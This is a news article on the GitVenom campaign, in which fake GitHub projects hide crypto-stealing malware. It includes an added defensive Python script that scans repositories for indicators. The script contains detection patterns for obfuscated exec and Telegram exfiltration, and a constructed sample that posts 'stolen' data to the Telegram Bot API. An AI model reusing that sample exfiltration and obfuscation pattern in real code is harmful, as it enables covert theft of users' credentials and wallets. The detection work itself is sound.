Cybercriminals are exploiting open-source platforms like GitHub to distribute malware, targeting software developers and crypto users, according to new research from Kaspersky’s Securelist.
While open-source code is meant to accelerate development and foster collaboration, hackers are uploading fake repositories designed to trick developers into downloading infected software.
🕵️ Fake GitHub Projects Hide Crypto-Stealing Malware
Kaspersky warns that these malicious repositories are carefully crafted to appear legitimate, often mimicking real projects.
“Threat actors went to great lengths to make the repositories appear legitimate to potential targets.”
One example includes a bogus Telegram bot project designed to manage Bitcoin wallets. However, hidden within the code was malware capable of stealing browsing history and crypto wallet data.
🔹 Key malware components include:
✅ Clipboard hijackers—which scan a victim’s computer for crypto wallet addresses, replacing them with attacker-controlled addresses.
✅ Data exfiltration—stealing passwords, banking details, and crypto wallet keys, then sending them to hackers via Telegram.
As of November 2024, one such Bitcoin wallet linked to the malware had already received a lump sum of 5 BTC (~$443,000 at current prices).
🌍 GitVenom’s Global Spread: Devs in Russia, Brazil & Turkey Hit Hard
Kaspersky has identified a new malware campaign named “GitVenom”, which has infected developers globally, with Russia, Brazil, and Turkey being the most affected regions.
With millions of developers relying on GitHub and other code-sharing platforms, these attacks highlight the growing risks of using unverified open-source code.
“For that reason, it is crucial to handle processing of third-party code very carefully. Before attempting to run such code or integrate it into an existing project, it is paramount to thoroughly check what actions it performs.”
⚠️ More Crypto Malware Targeting Developers

GitVenom isn’t the only active malware targeting software developers.
Last week, Microsoft Intelligence warned about a new variant of XCSSET, a macOS-focused malware that is capable of stealing cryptocurrency from infected devices.
🔹 XCSSET spreads through infected Xcode projects—the software environment used to develop macOS and iOS applications.
🔹 Once inside a system, the malware can extract crypto wallet credentials and perform unauthorized transactions.
🛡️ How Developers Can Stay Safe
Given the increasing malware risks on open-source platforms, developers should adopt best practices to secure their systems:
🔹 Verify code sources—Only download trusted repositories from verified authors.
🔹 Manually inspect code—Look for unexpected scripts, HTTP requests, or obfuscated commands.
🔹 Use sandbox environments—Test third-party code in isolated environments before running it on main systems.
🔹 Monitor clipboard activity—Be aware of any unexpected changes in copied wallet addresses.
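Two of the points above (manually inspecting third-party code for unexpected HTTP requests or obfuscated commands, and watching for a copied wallet address being swapped) and the malware components described earlier (Telegram-based exfiltration, clipboard hijacking) can be turned into a small triage script. The following is an added example written for this article; it is not code from Kaspersky, Securelist, or any project mentioned here. The indicator patterns, the hypothetical allowlist of expected hosts, the sample "bot" source and the wallet addresses are all constructed for illustration.

```python
"""Triage helper for a freshly cloned repository (added example, constructed).

Flags the indicator types the article names before any of the code is run:
obfuscated commands (exec/eval over base64- or zlib-decoded data), outbound
HTTP requests to hosts the project has no reason to contact, and Telegram
Bot API endpoints used to ship stolen data. It also includes a clipboard
consistency check that catches a copied wallet address being replaced.
These are heuristics for a human reviewer, not a malware verdict.
"""
import re
from dataclasses import dataclass
from pathlib import Path

INDICATORS = {
    # exec(...b64decode(...)) and friends: the classic hidden-payload pattern
    "obfuscated_exec": re.compile(
        r"\b(?:exec|eval)\s*\(.*\b(?:b64decode|base64|decompress|fromhex|unhexlify)\b", re.I
    ),
    # a very long encoded literal is usually a payload, not configuration
    "long_encoded_blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "http_request": re.compile(r"https?://[^\s'\"]+"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
}

# Hypothetical allowlist: hosts a typical Python project legitimately contacts.
# Adjust per project; anything outside it deserves a look.
EXPECTED_HOSTS = {"github.com", "pypi.org", "files.pythonhosted.org"}
SOURCE_SUFFIXES = {".py", ".js", ".ts", ".sh", ".ps1", ".rb"}


@dataclass
class Finding:
    rule: str
    line_no: int
    snippet: str


def _host(url: str) -> str:
    return url.split("//", 1)[1].split("/", 1)[0].split("@")[-1].lower()


def scan_source(text: str) -> list[Finding]:
    """Return indicator hits for one file's contents (one per rule per line)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in INDICATORS.items():
            match = pattern.search(line)
            if not match:
                continue
            if rule == "http_request" and _host(match.group(0)) in EXPECTED_HOSTS:
                continue  # ordinary dependency/project URL, not suspicious on its own
            findings.append(Finding(rule, line_no, line.strip()[:120]))
    return findings


def scan_tree(root: Path) -> dict[str, list[Finding]]:
    """Scan every source file under a checked-out repository, keyed by path."""
    results = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in SOURCE_SUFFIXES:
            hits = scan_source(path.read_text(errors="replace"))
            if hits:
                results[str(path.relative_to(root))] = hits
    return results


WALLET_PATTERNS = [
    re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),  # Bitcoin legacy (base58)
    re.compile(r"^bc1[a-z0-9]{39,59}$"),               # Bitcoin bech32
    re.compile(r"^0x[a-fA-F0-9]{40}$"),                # Ethereum-style
]


def looks_like_wallet_address(value: str) -> bool:
    value = value.strip()
    return any(p.match(value) for p in WALLET_PATTERNS)


def clipboard_was_swapped(copied: str, about_to_paste: str) -> bool:
    """True when the wallet address copied earlier no longer matches what the
    clipboard holds now: the signature of a clipboard hijacker at work."""
    return (
        looks_like_wallet_address(copied)
        and looks_like_wallet_address(about_to_paste)
        and copied.strip() != about_to_paste.strip()
    )


# Constructed sample mimicking a fake "wallet manager bot": a Telegram
# exfiltration endpoint plus a base64-obfuscated exec. Not real malware.
SAMPLE_BOT = '''import base64, requests
BOT_TOKEN = "PLACEHOLDER_TOKEN"  # constructed placeholder, not a real token
def report(stolen):
    requests.post("https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage", data=stolen)
print("index:", "https://pypi.org/simple/")
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''
COPIED_ADDR = "1ConstructedExampAddr123456789"    # constructed, base58-shaped
SWAPPED_ADDR = "1AttackerAddrConstructed98765432"  # constructed, base58-shaped

if __name__ == "__main__":
    for f in scan_source(SAMPLE_BOT):
        print(f"line {f.line_no}: {f.rule}: {f.snippet}")
    print("clipboard swap detected:", clipboard_was_swapped(COPIED_ADDR, SWAPPED_ADDR))
```

Run `scan_tree(Path("path/to/clone"))` on a repository before executing anything in it; every hit is a line to read by hand in a sandbox, which is exactly the manual inspection step above. The clipboard check is deliberately simple: compare the address you copied from a trusted source with the clipboard contents at paste time, and treat any difference between two well-formed addresses as a reason to stop.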
🚀 The Bigger Picture: Open-Source Security at Risk
As crypto adoption grows, cybercriminals are shifting focus toward high-value targets like developers who build financial apps and manage digital assets.
With GitHub and other repositories being widely used, securing open-source platforms will be critical to preventing further crypto-related exploits.
For developers, the message is clear: verify everything before running it—because even the most legitimate-looking GitHub project could be a trap.